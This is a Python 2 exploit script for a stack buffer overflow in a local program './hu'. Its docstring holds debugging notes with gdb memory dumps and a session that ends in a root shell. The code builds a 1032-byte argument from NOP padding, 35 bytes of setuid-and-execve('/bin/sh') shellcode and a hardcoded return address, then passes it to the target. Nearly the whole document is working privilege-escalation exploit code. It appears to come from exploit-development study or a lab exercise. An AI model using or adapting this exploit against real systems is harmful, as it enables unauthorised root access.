#!/usr/bin/env python
"""
Ok so it seems i made a mistake in my original
notes. sorry ;>
tip) check the stack to make sure your shellcode
is not being corrupted.
ex:
(gdb) x/10x $esp - 47
0xbffff591: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff5a1: 0x90909090 0x90909090 0xdb31c031 0xd231c931
0xbffff5b1: 0x80cd46b0 0x2f2f6851
(gdb)
0xbffff5b9: 0x2f686873 0x006e6962 0x2f000000 0x2f6e6962
0xbffff5c9: 0x0068732f 0x00000000 0xf0bffff7 0x48bffff5
0xbffff5d9: 0x75bffff6 0x70b7e8a7
(gdb) quit
we see our shellcode starting at 0xbffff5a1; going through
the addresses we see it gets corrupted for some reason at 0xbffff5b9:
null bytes -> fail.
Solution:
EIP resides at buffer offset 1032 exactly, so your buffer has to be 1028 bytes,
not 1032, since you use those extra 4 bytes as the EIP address.
anyway for this bug i just split the buffer up like so
NOPS -> 428 bytes
SHELLCODE -> 35 bytes
NOPS -> 565 bytes
RET -> 4 bytes
>>> 428 + 35 + 565 +4
1032
(gdb) x/10x $esp -625
0xbffff35f: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff36f: 0x90909090 0x31c03190 0x31c931db 0xcd46b0d2
0xbffff37f: 0x2f685180 0x6868732f
(gdb) quit
as you can see our shellcode is not corrupted this time as it was last time :D
---
root@user-laptop:/home/user# nano bleh.py
root@user-laptop:/home/user# python bleh.py
# id
uid=0(root) gid=0(root) groups=0(root)
# exit
"""
import os
import struct
# Machine-code payload copied verbatim from the notes above (35 bytes).
# This is a Python 2 script: every literal below is a byte string.
shellcode = (
"\x31\xc0\x31\xdb\x31\xc9"
"\x31\xd2\xb0\x46\xcd\x80"
"\x51\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89"
"\xe3\x51\x53\x89\xe1\x31"
"\xc0\xb0\x0b\xcd\x80")

# Layout of the 1032-byte argument, as documented in the module docstring:
# the saved return address sits at offset 1028, so the last 4 bytes of the
# string are the address written there (little-endian, hence '<L').
NOP = "\x90"
RET_ADDR = 0xbffff35f  # value taken from the gdb session in the docstring
segments = [
    NOP * 428,                     # leading NOP padding
    shellcode,                     # 35 bytes
    NOP * 565,                     # trailing NOP padding
    struct.pack('<L', RET_ADDR),   # 4-byte overwrite of the saved EIP
]
lols = "".join(segments)

# NOTE: os.system hands this string to /bin/sh unquoted, so the shell sees
# these bytes before ./hu does; the exit status of the shell is what gets
# printed.
print os.system("./hu %s" % lols)